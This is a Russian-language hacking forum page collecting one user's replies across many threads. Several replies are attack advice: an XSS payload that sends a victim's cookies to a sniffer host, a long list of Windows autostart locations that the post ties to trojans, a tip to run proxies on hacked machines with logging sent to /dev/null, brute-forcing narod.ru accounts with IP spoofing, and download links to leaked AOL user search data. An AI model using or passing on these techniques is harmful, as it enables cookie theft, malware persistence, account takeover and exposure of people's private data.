Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 34 35 36 37 38 39 40 41 42 43 44 45 След.
Apple MacBook взломали за минуту
 
Уже обсуждалось касательно MacBook в комьюнити
http://community.livejournal.com/ru_wifisec/15953.html?mode=reply

Цитата
Драйверы карточек фирмы Apple не содержат лазеек для переполнения c помощью кадров 802.11, выполнения неавторзированного кода и абсолютно стабильны. После проведённой экспертизы было выяснено, что при проведении видео-демонстрации хакерами использовались "noname" сетевые карточки (3d party). Спонсор действия, компания SecureWorks, признала и подтвердила фальсификацию.
ExBB, Пмогите...
 
Всё, что ты написали посоветую - внимательнее читай и больше практикуй. Есть куча уязвимостей, в том числе и недокументрированных в данном продукте, Algol давно постил целый ряд багов касательно данного форума.
Нубовсткий вопрос про сниферы
 
Так же в сети выложен сорец подобного - PHP sniffer. Передача параметров снифферу осуществляется через CGI-строку, расположенную после знака ?. Например: http://antichat.ru/cgi-bin/s.jpg?здесь_мои_данные

Но ты дожен помнить, что просто так куки с другого домена взять невозможно. Посредством пхп кукисы берутся из переменной $_COOKIE

Вот что получается при попытке обратиться к кукам одного домена с другого посредством JS.

Код
undefined
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.4 (build 01348))
http://localhost:8080/php1C5.tmp================================== 


Права не позволяют. Поэтому отыщи XSS на сайте жертве и работай с конструкцией вида

site/?search=<script language=javascript>document.write('<img src="http://sniffer?'+document.cookies+'" >');</script>
подсчет трафика
 
http://www.tmeter.ru/
Новенькая прога SQL Injection Tool
 
Ни одна автоматизирванная программа не способна выполнить слепую иньекцию в базу, найти - возможно и сканнером. Порадовало наличие опции пробручивания таблиц. Софт дельный.
перехват http запросов
 
По поводу прокси - SURU MITM Proxy именно этим и занимается.
прокси сервер
 
Я не знаю, кто здесь конкретно нанимался в рассказчики, но почитать хенд-бук, либо мануалы по установки программы с известным названием может любой физически развитый человек в силу наличия зрения и способности вбить google.com

Про SSH вообще посторонний разговор, так как его основное значение создание туннелирования для управления, более того с точки зрения безопасности возможен перехват ключей, хотя безусловно IP логируется используемого SSH-сервера. Частные виртуальные сети подвержены атакам из-вне, поэтому требуется подбирать наиболее качественный сервис, к тому же не ведущий логов. Например, сервис Stamp'a.  Вопрос задавался конкретно про прокси. Ответ был получен на примере известнейшего релиза от ЗАРАЗЫ с русским описанием.
необычный автозапуск
 
Выбирай

Цитата

C:\windows\start menu\programs\startup {english}
C:\windows\Menu Démarrer\Programmes\Démarrage {french}
C:\windows\All Users\Menu Iniciar\Programas\Iniciar { Portuguese, Brasilian }

* [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Shell Folders]
Startup="C:\windows\start menu\programs\startup"

* [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\User Shell Folders]
Startup="C:\windows\start menu\programs\startup"

* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\explorer\User Shell Folders]
"Common Startup"="C:\windows\start menu\programs\startup"

* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\explorer\Shell Folders]
"Common Startup"="C:\windows\start menu\programs\startup"

2. Win.ini
[windows]
load=file.exe
run=file.exe

3. System.ini
[boot]
Shell=Explorer.exe file.exe

4. c:\windows\winstart.bat

5. Registry

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices]
"Whatever"="c:\runfolder\program.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce]
"Whatever"="c:\runfolder\program.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run]
"Whatever"="c:\runfolder\program.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"Whatever"="c:\runfolder\program.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunServices]
"Whatever"="c:\runfolder\program.exe"

6. c:\windows\wininit.ini

'Often Used by Setup-Programs when the file exists it is run ONCE and then is deleted by windows
Example content of wininit.ini :
[Rename]
NUL=c:\windows\picture.exe
' This example sends c:\windows\picture.exe to NUL, which means that it is being deleted.
This requires no interactivity with the user and runs totaly stealth.

7. Autoexec.bat

Starts everytime at Dos Level.

8. Registry Shell Spawning

[HKEY_CLASSES_ROOT\exefile\shell\open\command] @=""%1" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @=""%1" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @=""%1" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @=""%1" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] @=""%1" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\ open\command] @=""%1" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\ open\command] @=""%1" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\ open\command] @=""%1" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\ Open\Command] @=""%1" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\ open\command] @=""%1" %*"
The key should have a value of Value "%1 %*", if this is changed to "server.exe %1 %*", the server.exe
is executed EVERYTIME an exe/pif/com/bat/hta is executed.
Known as Unkown Starting Method and is currently used by Subseven.

9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.

10. Explorer start-up

Windows 95,98,ME
Explorer.exe ist started through a system.ini entry, the entry itself contains no path information
so if c:\explorer.exe exist it will be started instead of c:\$winpath\explorer.exe.

Windows NT/2000
The Windows Shell is the familiar desktop that's used for interacting with Windows. During system
startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, to determine the
name of the executable that should be loaded as the Shell.

By default, this value specifies Explorer.exe.

The problem has to do with the search order that occurs when system startup is in process.
Whenever a registry entry specifies the name of a code module, but does it using a relative path,
Windows initiates a search process to find the code. The search order is as follows:

* Search the current directory.
* If the code isn't found, search the directories specified in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Environment\Path, in the order
in which they are specified.
* If the code isn't found, search the directories specified in HKEY_CURRENT_USER\Environment\Path,
in the order in which they are specified.

More info : http://www.microsoft.com/technet/sec...n/fq00-052.asp
Patch : http://www.microsoft.com/technet/sup....asp?ID=269049

General :
If a trojan installs itself as c:\explorer no run keys or other start-up entries are needed.
If c:\explorer.exe is a corrupted file the user will be locked out of the system. Affects all windows
version as of today.

10. Active-X Component

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=C:\PathToFile\Filename.exe

Believe it or not, this does start filename.exe BEFORE the shell (explorer.exe) and any other Program normaly
started over the Run Keys.

11. Misc Information

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] @="Scrap object"
"NeverShowExt"=""
Б/у мобильники содержат личные данные прежних владельцев
 
http://www.msab.com/archive/index.html

К размышлению о действиях майора на видео или немного о комплекте XRY)
прокси сервер
 
Не советую ориентрироваться на полученные линки, так как подобные серсестественно не качественны, боьшинство из выложенных прокси ведут лог, скорость на них меньше, чем на модеме. Как вариант - устанавливать 3proxy на взломанные машины и в онфиге прописывать запись логов в "непишущую область", например в dev/null. Таким макаром лог писать естественно не будет.
Глюки с ICQ
 
1) изменения в протоколе
2) либо брутят уин (макс. лимит коннектов ограничен)
Забанили на IRC серве., Помогите прорваться!
 
www.aliveproxy.com/irc-proxy-list
Б/у мобильники содержат личные данные прежних владельцев
 
Ладно, ответа получено не было - тулза SimBrush, Open-Source(!) утилита для восстновления любой информации с SIM (USIM) карты владельца мобильного телефона. Используется в том числе спец.службами для проведения анализа содержания данных устройства.
[ Закрыто] Windows vs Linux, что то типа холивар, но с фактами
 
Избитейшая тема - тема вкусов, тема пристрастий. Товарищи, не переубедите юзать и то и другое, обе платформы самодостаточные. На ноутбуке сейчас OpenBsd, домашнем Пк - VISTA RC1.
Не пинайте новичка за вопрос, Как это можно зделать, взломать народ
 
ЛОЛ.

Даже, если вам удостоилось найти в сети контакт с сотрудниками, уже под подушку?) С судимыми или отсидевшими удалённо по сети - не вижу опасения общаться тоже. По крайней мере не забыты такие вещи как тест на проникновение и просто восстановление своего собственного забытого пароля.

Кстати я крайне сомневаюсь, что девушка сейчас выполняет правильные действия. Конечно в деле с народом - стоит взять мыло и ретривнуть (если вопросов конечно нет), это одно. Просто не все бруты пашут сейчас это раз, а два - на моей памяти как минимум 2е модификации авторизации со времён Yandex Brute) Если ошибаюсь, что девушка делает не то - заведомо извиняюсь.
Банда фишеров обворовывала клиентов AOL
 
А нечего уникального кстати) После :

Цитата

Недавно компания AOL потерпела крах в собственном ПО, обеспечивающего защиту анонимной информации о собственных юзерах и совершённых ими поисковых запросах. Более 20 миллионов запросов трёхмесячной давности от 650,000 AOL пользователей попало в паблик. AOL упустил тонны конфиденциальной информации без ведома собственных клиентов. Информация включает в себя фамилии, имена, адреса, номера социальных карт и ещё кучу всего, что вводилось пользователями в поисковую строку. Применение базы достаточно ясно. Нажмите "читать дальше", чтобы получить ссылки на 450mb архив (2gb - разархивированной информации).

В продолжение темы, столь знаменитая компания совсем потеряла страх и распрашивает собственных клиентов вопросами, не имеющими отношения к их нуждам, советую просмотреть ссылку, где представлена запись телефонного разговора молодого человека и сотрудника компании.

Ссылки на скачивание базы:
http://fack.org/AOL-user-ct-collection/
http://aolsearchlogs.cloudsites.com/AOL-data.tgz
http://www.leafyhost.com/AOL-data.tgz

http://cup.su/news/278/

Там же линки на рапиду. Байнной давности новость, но так же как и эта подерждающая, что из себя представляет сетевой гигант.
Возможно ли это...
 
Хех...данный "взлом" основан на сравнении.  Ключи большой битности таким макаром подобрать не удасться. Более подробно о такого рода алоритмах (технология AES) парси:

Цитата
  1.  Rijndael, предложенный Джоан Димен из компании Proton World International и Винсентом Риджменом из бельгийского университета Katholieke Universiteit Leuven. В конце концов, именно Rijndael был выбран NIST в качестве нового AES.
  2. MARS, предложенный компанией IBM.
  3. RC6™, предложенный RSA Laboratories. Его название - это сокращение от Rivest Cipher #6, в соответствии с традицией названия созданных ранее RSA алгоритмов с закрытыми ключами, таких, как RC2, RC4 и RC5.
  4. Serpent, предложенный Россом Андерсоном из Кембриджского университета (Англия), Эли Бихамом из Technion (Израиль) и Ларсом Кнудсеном из Калифорнийского университета.
  5. Twofish, предложенный Брюсом Шнейером, Джоном Келси и Нильсом Фергюсоном из Counterpane Internet Security, Дэвидом Вагнером из Калифорнийского университета, Дугом Уайтингом из Hi/Fn и Крисом Холлом из Принстонского университета.
Не пинайте новичка за вопрос, Как это можно зделать, взломать народ
 
2 Urinix:

Она и не говорила, что админ. Даже у более-менее нормальных пользователей, на спор,  этот вопрос крайне интересует. Кстати есть тендеция у скромных юных пользовтелей регаться под никами девушек, чтобы не вызывать особой агрессии)
Возможно ли это...
 
Алгоритм на собственном крипо-апи.
Алгебраически-замкнутые алгоритмы, выделение систем из которых затруднительно, к примеру AES
Не пинайте новичка за вопрос, Как это можно зделать, взломать народ
 
Требуется отснифать запрос HTTP Авторизации, следоватльно после чего использовать его в переборе с поддержкой подмены IP адреса, с которого происходит атака, так как на народе действует лимит попыток с 1 IP, как и везде.

Замечу, НЕ ВСЕ паблик брутфорсы позволяют успешно производить атаки HTTP-flood (по сути брут авторизации производится флудом определённым запросом с изменяющимся параметром (pass) ).
Страницы: Пред. 1 ... 34 35 36 37 38 39 40 41 42 43 44 45 След.